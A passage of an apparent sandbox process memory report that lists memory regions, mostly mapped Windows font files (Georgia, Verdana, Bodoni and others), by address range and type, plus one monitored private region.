filename = "\\Windows\\Fonts\\constanb.ttf" (normalized: "c:\\windows\\fonts\\constanb.ttf")
Region:
id = 850
start_va = 0x970000
end_va = 0x9defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "constanb.ttf"
filename = "\\Windows\\Fonts\\constanb.ttf" (normalized: "c:\\windows\\fonts\\constanb.ttf")
Region:
id = 851
start_va = 0x970000
end_va = 0x9defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "constanz.ttf"
filename = "\\Windows\\Fonts\\constanz.ttf" (normalized: "c:\\windows\\fonts\\constanz.ttf")
Region:
id = 852
start_va = 0x970000
end_va = 0x9defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "constanz.ttf"
filename = "\\Windows\\Fonts\\constanz.ttf" (normalized: "c:\\windows\\fonts\\constanz.ttf")
Region:
id = 853
start_va = 0x8b0000
end_va = 0x8effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "corbel.ttf"
filename = "\\Windows\\Fonts\\corbel.ttf" (normalized: "c:\\windows\\fonts\\corbel.ttf")
Region:
id = 854
start_va = 0x8b0000
end_va = 0x8effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "corbel.ttf"
filename = "\\Windows\\Fonts\\corbel.ttf" (normalized: "c:\\windows\\fonts\\corbel.ttf")
Region:
id = 855
start_va = 0x970000
end_va = 0x9b1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "corbeli.ttf"
filename = "\\Windows\\Fonts\\corbeli.ttf" (normalized: "c:\\windows\\fonts\\corbeli.ttf")
Region:
id = 856
start_va = 0x970000
end_va = 0x9b1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "corbeli.ttf"
filename = "\\Windows\\Fonts\\corbeli.ttf" (normalized: "c:\\windows\\fonts\\corbeli.ttf")
Region:
id = 857
start_va = 0x970000
end_va = 0x9b2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "corbelb.ttf"
filename = "\\Windows\\Fonts\\corbelb.ttf" (normalized: "c:\\windows\\fonts\\corbelb.ttf")
Region:
id = 858
start_va = 0x970000
end_va = 0x9b2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "corbelb.ttf"
filename = "\\Windows\\Fonts\\corbelb.ttf" (normalized: "c:\\windows\\fonts\\corbelb.ttf")
Region:
id = 859
start_va = 0x970000
end_va = 0x9b4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "corbelz.ttf"
filename = "\\Windows\\Fonts\\corbelz.ttf" (normalized: "c:\\windows\\fonts\\corbelz.ttf")
Region:
id = 860
start_va = 0x970000
end_va = 0x9b4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "corbelz.ttf"
filename = "\\Windows\\Fonts\\corbelz.ttf" (normalized: "c:\\windows\\fonts\\corbelz.ttf")
Region:
id = 861
start_va = 0x8b0000
end_va = 0x8d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "framd.ttf"
filename = "\\Windows\\Fonts\\framd.ttf" (normalized: "c:\\windows\\fonts\\framd.ttf")
Region:
id = 862
start_va = 0x8b0000
end_va = 0x8d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "framd.ttf"
filename = "\\Windows\\Fonts\\framd.ttf" (normalized: "c:\\windows\\fonts\\framd.ttf")
Region:
id = 863
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "framdit.ttf"
filename = "\\Windows\\Fonts\\framdit.ttf" (normalized: "c:\\windows\\fonts\\framdit.ttf")
Region:
id = 864
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "framdit.ttf"
filename = "\\Windows\\Fonts\\framdit.ttf" (normalized: "c:\\windows\\fonts\\framdit.ttf")
Region:
id = 865
start_va = 0x4ff0000
end_va = 0x51a8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gabriola.ttf"
filename = "\\Windows\\Fonts\\Gabriola.ttf" (normalized: "c:\\windows\\fonts\\gabriola.ttf")
Region:
id = 866
start_va = 0x4ff0000
end_va = 0x51a8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gabriola.ttf"
filename = "\\Windows\\Fonts\\Gabriola.ttf" (normalized: "c:\\windows\\fonts\\gabriola.ttf")
Region:
id = 867
start_va = 0xee0000
end_va = 0xfbafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 868
start_va = 0x8b0000
end_va = 0x8d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "georgia.ttf"
filename = "\\Windows\\Fonts\\georgia.ttf" (normalized: "c:\\windows\\fonts\\georgia.ttf")
Region:
id = 869
start_va = 0x8b0000
end_va = 0x8d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "georgia.ttf"
filename = "\\Windows\\Fonts\\georgia.ttf" (normalized: "c:\\windows\\fonts\\georgia.ttf")
Region:
id = 870
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "georgiai.ttf"
filename = "\\Windows\\Fonts\\georgiai.ttf" (normalized: "c:\\windows\\fonts\\georgiai.ttf")
Region:
id = 871
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "georgiai.ttf"
filename = "\\Windows\\Fonts\\georgiai.ttf" (normalized: "c:\\windows\\fonts\\georgiai.ttf")
Region:
id = 872
start_va = 0x8b0000
end_va = 0x8d3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "georgiab.ttf"
filename = "\\Windows\\Fonts\\georgiab.ttf" (normalized: "c:\\windows\\fonts\\georgiab.ttf")
Region:
id = 873
start_va = 0x8b0000
end_va = 0x8d3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "georgiab.ttf"
filename = "\\Windows\\Fonts\\georgiab.ttf" (normalized: "c:\\windows\\fonts\\georgiab.ttf")
Region:
id = 874
start_va = 0x8b0000
end_va = 0x8d8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "georgiaz.ttf"
filename = "\\Windows\\Fonts\\georgiaz.ttf" (normalized: "c:\\windows\\fonts\\georgiaz.ttf")
Region:
id = 875
start_va = 0x8b0000
end_va = 0x8d8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "georgiaz.ttf"
filename = "\\Windows\\Fonts\\georgiaz.ttf" (normalized: "c:\\windows\\fonts\\georgiaz.ttf")
Region:
id = 876
start_va = 0x12b0000
end_va = 0x1323fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pala.ttf"
filename = "\\Windows\\Fonts\\pala.ttf" (normalized: "c:\\windows\\fonts\\pala.ttf")
Region:
id = 877
start_va = 0x12b0000
end_va = 0x1323fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pala.ttf"
filename = "\\Windows\\Fonts\\pala.ttf" (normalized: "c:\\windows\\fonts\\pala.ttf")
Region:
id = 878
start_va = 0x970000
end_va = 0x9d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "palai.ttf"
filename = "\\Windows\\Fonts\\palai.ttf" (normalized: "c:\\windows\\fonts\\palai.ttf")
Region:
id = 879
start_va = 0x970000
end_va = 0x9d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "palai.ttf"
filename = "\\Windows\\Fonts\\palai.ttf" (normalized: "c:\\windows\\fonts\\palai.ttf")
Region:
id = 880
start_va = 0x970000
end_va = 0x9d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "palab.ttf"
filename = "\\Windows\\Fonts\\palab.ttf" (normalized: "c:\\windows\\fonts\\palab.ttf")
Region:
id = 881
start_va = 0x970000
end_va = 0x9d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "palab.ttf"
filename = "\\Windows\\Fonts\\palab.ttf" (normalized: "c:\\windows\\fonts\\palab.ttf")
Region:
id = 882
start_va = 0x970000
end_va = 0x9c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "palabi.ttf"
filename = "\\Windows\\Fonts\\palabi.ttf" (normalized: "c:\\windows\\fonts\\palabi.ttf")
Region:
id = 883
start_va = 0x970000
end_va = 0x9c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "palabi.ttf"
filename = "\\Windows\\Fonts\\palabi.ttf" (normalized: "c:\\windows\\fonts\\palabi.ttf")
Region:
id = 884
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoepr.ttf"
filename = "\\Windows\\Fonts\\segoepr.ttf" (normalized: "c:\\windows\\fonts\\segoepr.ttf")
Region:
id = 885
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoepr.ttf"
filename = "\\Windows\\Fonts\\segoepr.ttf" (normalized: "c:\\windows\\fonts\\segoepr.ttf")
Region:
id = 886
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeprb.ttf"
filename = "\\Windows\\Fonts\\segoeprb.ttf" (normalized: "c:\\windows\\fonts\\segoeprb.ttf")
Region:
id = 887
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeprb.ttf"
filename = "\\Windows\\Fonts\\segoeprb.ttf" (normalized: "c:\\windows\\fonts\\segoeprb.ttf")
Region:
id = 888
start_va = 0x8b0000
end_va = 0x8d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "trebuc.ttf"
filename = "\\Windows\\Fonts\\trebuc.ttf" (normalized: "c:\\windows\\fonts\\trebuc.ttf")
Region:
id = 889
start_va = 0x8b0000
end_va = 0x8d1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "trebuc.ttf"
filename = "\\Windows\\Fonts\\trebuc.ttf" (normalized: "c:\\windows\\fonts\\trebuc.ttf")
Region:
id = 890
start_va = 0x8b0000
end_va = 0x8d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "trebucit.ttf"
filename = "\\Windows\\Fonts\\trebucit.ttf" (normalized: "c:\\windows\\fonts\\trebucit.ttf")
Region:
id = 891
start_va = 0x8b0000
end_va = 0x8d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "trebucit.ttf"
filename = "\\Windows\\Fonts\\trebucit.ttf" (normalized: "c:\\windows\\fonts\\trebucit.ttf")
Region:
id = 892
start_va = 0x8b0000
end_va = 0x8cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "trebucbd.ttf"
filename = "\\Windows\\Fonts\\trebucbd.ttf" (normalized: "c:\\windows\\fonts\\trebucbd.ttf")
Region:
id = 893
start_va = 0x8b0000
end_va = 0x8cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "trebucbd.ttf"
filename = "\\Windows\\Fonts\\trebucbd.ttf" (normalized: "c:\\windows\\fonts\\trebucbd.ttf")
Region:
id = 894
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "trebucbi.ttf"
filename = "\\Windows\\Fonts\\trebucbi.ttf" (normalized: "c:\\windows\\fonts\\trebucbi.ttf")
Region:
id = 895
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "trebucbi.ttf"
filename = "\\Windows\\Fonts\\trebucbi.ttf" (normalized: "c:\\windows\\fonts\\trebucbi.ttf")
Region:
id = 896
start_va = 0x8b0000
end_va = 0x8ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "verdana.ttf"
filename = "\\Windows\\Fonts\\verdana.ttf" (normalized: "c:\\windows\\fonts\\verdana.ttf")
Region:
id = 897
start_va = 0x8b0000
end_va = 0x8ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "verdana.ttf"
filename = "\\Windows\\Fonts\\verdana.ttf" (normalized: "c:\\windows\\fonts\\verdana.ttf")
Region:
id = 898
start_va = 0x8b0000
end_va = 0x8dbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "verdanai.ttf"
filename = "\\Windows\\Fonts\\verdanai.ttf" (normalized: "c:\\windows\\fonts\\verdanai.ttf")
Region:
id = 899
start_va = 0x8b0000
end_va = 0x8dbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "verdanai.ttf"
filename = "\\Windows\\Fonts\\verdanai.ttf" (normalized: "c:\\windows\\fonts\\verdanai.ttf")
Region:
id = 900
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "verdanab.ttf"
filename = "\\Windows\\Fonts\\verdanab.ttf" (normalized: "c:\\windows\\fonts\\verdanab.ttf")
Region:
id = 901
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "verdanab.ttf"
filename = "\\Windows\\Fonts\\verdanab.ttf" (normalized: "c:\\windows\\fonts\\verdanab.ttf")
Region:
id = 902
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "verdanaz.ttf"
filename = "\\Windows\\Fonts\\verdanaz.ttf" (normalized: "c:\\windows\\fonts\\verdanaz.ttf")
Region:
id = 903
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "verdanaz.ttf"
filename = "\\Windows\\Fonts\\verdanaz.ttf" (normalized: "c:\\windows\\fonts\\verdanaz.ttf")
Region:
id = 904
start_va = 0x8b0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "webdings.ttf"
filename = "\\Windows\\Fonts\\webdings.ttf" (normalized: "c:\\windows\\fonts\\webdings.ttf")
Region:
id = 905
start_va = 0x8b0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "webdings.ttf"
filename = "\\Windows\\Fonts\\webdings.ttf" (normalized: "c:\\windows\\fonts\\webdings.ttf")
Region:
id = 906
start_va = 0x610000
end_va = 0x615fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coure.fon"
filename = "\\Windows\\Fonts\\coure.fon" (normalized: "c:\\windows\\fonts\\coure.fon")
Region:
id = 907
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "serife.fon"
filename = "\\Windows\\Fonts\\serife.fon" (normalized: "c:\\windows\\fonts\\serife.fon")
Region:
id = 908
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sserife.fon"
filename = "\\Windows\\Fonts\\sserife.fon" (normalized: "c:\\windows\\fonts\\sserife.fon")
Region:
id = 909
start_va = 0x610000
end_va = 0x616fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "smalle.fon"
filename = "\\Windows\\Fonts\\smalle.fon" (normalized: "c:\\windows\\fonts\\smalle.fon")
Region:
id = 910
start_va = 0x610000
end_va = 0x615fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "smallf.fon"
filename = "\\Windows\\Fonts\\smallf.fon" (normalized: "c:\\windows\\fonts\\smallf.fon")
Region:
id = 911
start_va = 0x4ff0000
end_va = 0x5138fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "nirmala.ttf"
filename = "\\Windows\\Fonts\\NIRMALA.TTF" (normalized: "c:\\windows\\fonts\\nirmala.ttf")
Region:
id = 912
start_va = 0x4ff0000
end_va = 0x5138fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "nirmala.ttf"
filename = "\\Windows\\Fonts\\NIRMALA.TTF" (normalized: "c:\\windows\\fonts\\nirmala.ttf")
Region:
id = 913
start_va = 0x4ff0000
end_va = 0x512cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "nirmalab.ttf"
filename = "\\Windows\\Fonts\\NIRMALAB.TTF" (normalized: "c:\\windows\\fonts\\nirmalab.ttf")
Region:
id = 914
start_va = 0x4ff0000
end_va = 0x512cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "nirmalab.ttf"
filename = "\\Windows\\Fonts\\NIRMALAB.TTF" (normalized: "c:\\windows\\fonts\\nirmalab.ttf")
Region:
id = 915
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "agencyb.ttf"
filename = "\\Windows\\Fonts\\AGENCYB.TTF" (normalized: "c:\\windows\\fonts\\agencyb.ttf")
Region:
id = 916
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "agencyb.ttf"
filename = "\\Windows\\Fonts\\AGENCYB.TTF" (normalized: "c:\\windows\\fonts\\agencyb.ttf")
Region:
id = 917
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "agencyr.ttf"
filename = "\\Windows\\Fonts\\AGENCYR.TTF" (normalized: "c:\\windows\\fonts\\agencyr.ttf")
Region:
id = 918
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "agencyr.ttf"
filename = "\\Windows\\Fonts\\AGENCYR.TTF" (normalized: "c:\\windows\\fonts\\agencyr.ttf")
Region:
id = 919
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alger.ttf"
filename = "\\Windows\\Fonts\\ALGER.TTF" (normalized: "c:\\windows\\fonts\\alger.ttf")
Region:
id = 920
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alger.ttf"
filename = "\\Windows\\Fonts\\ALGER.TTF" (normalized: "c:\\windows\\fonts\\alger.ttf")
Region:
id = 921
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "antquab.ttf"
filename = "\\Windows\\Fonts\\ANTQUAB.TTF" (normalized: "c:\\windows\\fonts\\antquab.ttf")
Region:
id = 922
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "antquab.ttf"
filename = "\\Windows\\Fonts\\ANTQUAB.TTF" (normalized: "c:\\windows\\fonts\\antquab.ttf")
Region:
id = 923
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "antquabi.ttf"
filename = "\\Windows\\Fonts\\ANTQUABI.TTF" (normalized: "c:\\windows\\fonts\\antquabi.ttf")
Region:
id = 924
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "antquabi.ttf"
filename = "\\Windows\\Fonts\\ANTQUABI.TTF" (normalized: "c:\\windows\\fonts\\antquabi.ttf")
Region:
id = 925
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "antquai.ttf"
filename = "\\Windows\\Fonts\\ANTQUAI.TTF" (normalized: "c:\\windows\\fonts\\antquai.ttf")
Region:
id = 926
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "antquai.ttf"
filename = "\\Windows\\Fonts\\ANTQUAI.TTF" (normalized: "c:\\windows\\fonts\\antquai.ttf")
Region:
id = 927
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialn.ttf"
filename = "\\Windows\\Fonts\\ARIALN.TTF" (normalized: "c:\\windows\\fonts\\arialn.ttf")
Region:
id = 928
start_va = 0x8b0000
end_va = 0x8dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialn.ttf"
filename = "\\Windows\\Fonts\\ARIALN.TTF" (normalized: "c:\\windows\\fonts\\arialn.ttf")
Region:
id = 929
start_va = 0x8b0000
end_va = 0x8dcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialnb.ttf"
filename = "\\Windows\\Fonts\\ARIALNB.TTF" (normalized: "c:\\windows\\fonts\\arialnb.ttf")
Region:
id = 930
start_va = 0x8b0000
end_va = 0x8dcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialnb.ttf"
filename = "\\Windows\\Fonts\\ARIALNB.TTF" (normalized: "c:\\windows\\fonts\\arialnb.ttf")
Region:
id = 931
start_va = 0x8b0000
end_va = 0x8dbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialnbi.ttf"
filename = "\\Windows\\Fonts\\ARIALNBI.TTF" (normalized: "c:\\windows\\fonts\\arialnbi.ttf")
Region:
id = 932
start_va = 0x8b0000
end_va = 0x8dbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialnbi.ttf"
filename = "\\Windows\\Fonts\\ARIALNBI.TTF" (normalized: "c:\\windows\\fonts\\arialnbi.ttf")
Region:
id = 933
start_va = 0x8b0000
end_va = 0x8dcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialni.ttf"
filename = "\\Windows\\Fonts\\ARIALNI.TTF" (normalized: "c:\\windows\\fonts\\arialni.ttf")
Region:
id = 934
start_va = 0x8b0000
end_va = 0x8dcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialni.ttf"
filename = "\\Windows\\Fonts\\ARIALNI.TTF" (normalized: "c:\\windows\\fonts\\arialni.ttf")
Region:
id = 935
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arlrdbd.ttf"
filename = "\\Windows\\Fonts\\ARLRDBD.TTF" (normalized: "c:\\windows\\fonts\\arlrdbd.ttf")
Region:
id = 936
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arlrdbd.ttf"
filename = "\\Windows\\Fonts\\ARLRDBD.TTF" (normalized: "c:\\windows\\fonts\\arlrdbd.ttf")
Region:
id = 937
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "baskvill.ttf"
filename = "\\Windows\\Fonts\\BASKVILL.TTF" (normalized: "c:\\windows\\fonts\\baskvill.ttf")
Region:
id = 938
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "baskvill.ttf"
filename = "\\Windows\\Fonts\\BASKVILL.TTF" (normalized: "c:\\windows\\fonts\\baskvill.ttf")
Region:
id = 939
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bauhs93.ttf"
filename = "\\Windows\\Fonts\\BAUHS93.TTF" (normalized: "c:\\windows\\fonts\\bauhs93.ttf")
Region:
id = 940
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bauhs93.ttf"
filename = "\\Windows\\Fonts\\BAUHS93.TTF" (normalized: "c:\\windows\\fonts\\bauhs93.ttf")
Region:
id = 941
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bell.ttf"
filename = "\\Windows\\Fonts\\BELL.TTF" (normalized: "c:\\windows\\fonts\\bell.ttf")
Region:
id = 942
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bell.ttf"
filename = "\\Windows\\Fonts\\BELL.TTF" (normalized: "c:\\windows\\fonts\\bell.ttf")
Region:
id = 943
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bellb.ttf"
filename = "\\Windows\\Fonts\\BELLB.TTF" (normalized: "c:\\windows\\fonts\\bellb.ttf")
Region:
id = 944
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bellb.ttf"
filename = "\\Windows\\Fonts\\BELLB.TTF" (normalized: "c:\\windows\\fonts\\bellb.ttf")
Region:
id = 945
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "belli.ttf"
filename = "\\Windows\\Fonts\\BELLI.TTF" (normalized: "c:\\windows\\fonts\\belli.ttf")
Region:
id = 946
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "belli.ttf"
filename = "\\Windows\\Fonts\\BELLI.TTF" (normalized: "c:\\windows\\fonts\\belli.ttf")
Region:
id = 947
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bernhc.ttf"
filename = "\\Windows\\Fonts\\BERNHC.TTF" (normalized: "c:\\windows\\fonts\\bernhc.ttf")
Region:
id = 948
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bernhc.ttf"
filename = "\\Windows\\Fonts\\BERNHC.TTF" (normalized: "c:\\windows\\fonts\\bernhc.ttf")
Region:
id = 949
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bkant.ttf"
filename = "\\Windows\\Fonts\\BKANT.TTF" (normalized: "c:\\windows\\fonts\\bkant.ttf")
Region:
id = 950
start_va = 0x8b0000
end_va = 0x8d5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bkant.ttf"
filename = "\\Windows\\Fonts\\BKANT.TTF" (normalized: "c:\\windows\\fonts\\bkant.ttf")
Region:
id = 951
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_b.ttf"
filename = "\\Windows\\Fonts\\BOD_B.TTF" (normalized: "c:\\windows\\fonts\\bod_b.ttf")
Region:
id = 952
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_b.ttf"
filename = "\\Windows\\Fonts\\BOD_B.TTF" (normalized: "c:\\windows\\fonts\\bod_b.ttf")
Region:
id = 953
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_bi.ttf"
filename = "\\Windows\\Fonts\\BOD_BI.TTF" (normalized: "c:\\windows\\fonts\\bod_bi.ttf")
Region:
id = 954
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_bi.ttf"
filename = "\\Windows\\Fonts\\BOD_BI.TTF" (normalized: "c:\\windows\\fonts\\bod_bi.ttf")
Region:
id = 955
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_blai.ttf"
filename = "\\Windows\\Fonts\\BOD_BLAI.TTF" (normalized: "c:\\windows\\fonts\\bod_blai.ttf")
Region:
id = 956
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_blai.ttf"
filename = "\\Windows\\Fonts\\BOD_BLAI.TTF" (normalized: "c:\\windows\\fonts\\bod_blai.ttf")
Region:
id = 957
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_blar.ttf"
filename = "\\Windows\\Fonts\\BOD_BLAR.TTF" (normalized: "c:\\windows\\fonts\\bod_blar.ttf")
Region:
id = 958
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_blar.ttf"
filename = "\\Windows\\Fonts\\BOD_BLAR.TTF" (normalized: "c:\\windows\\fonts\\bod_blar.ttf")
Region:
id = 959
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cb.ttf"
filename = "\\Windows\\Fonts\\BOD_CB.TTF" (normalized: "c:\\windows\\fonts\\bod_cb.ttf")
Region:
id = 960
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cb.ttf"
filename = "\\Windows\\Fonts\\BOD_CB.TTF" (normalized: "c:\\windows\\fonts\\bod_cb.ttf")
Region:
id = 961
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cbi.ttf"
filename = "\\Windows\\Fonts\\BOD_CBI.TTF" (normalized: "c:\\windows\\fonts\\bod_cbi.ttf")
Region:
id = 962
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cbi.ttf"
filename = "\\Windows\\Fonts\\BOD_CBI.TTF" (normalized: "c:\\windows\\fonts\\bod_cbi.ttf")
Region:
id = 963
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_ci.ttf"
filename = "\\Windows\\Fonts\\BOD_CI.TTF" (normalized: "c:\\windows\\fonts\\bod_ci.ttf")
Region:
id = 964
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_ci.ttf"
filename = "\\Windows\\Fonts\\BOD_CI.TTF" (normalized: "c:\\windows\\fonts\\bod_ci.ttf")
Region:
id = 965
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cr.ttf"
filename = "\\Windows\\Fonts\\BOD_CR.TTF" (normalized: "c:\\windows\\fonts\\bod_cr.ttf")
Region:
id = 966
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cr.ttf"
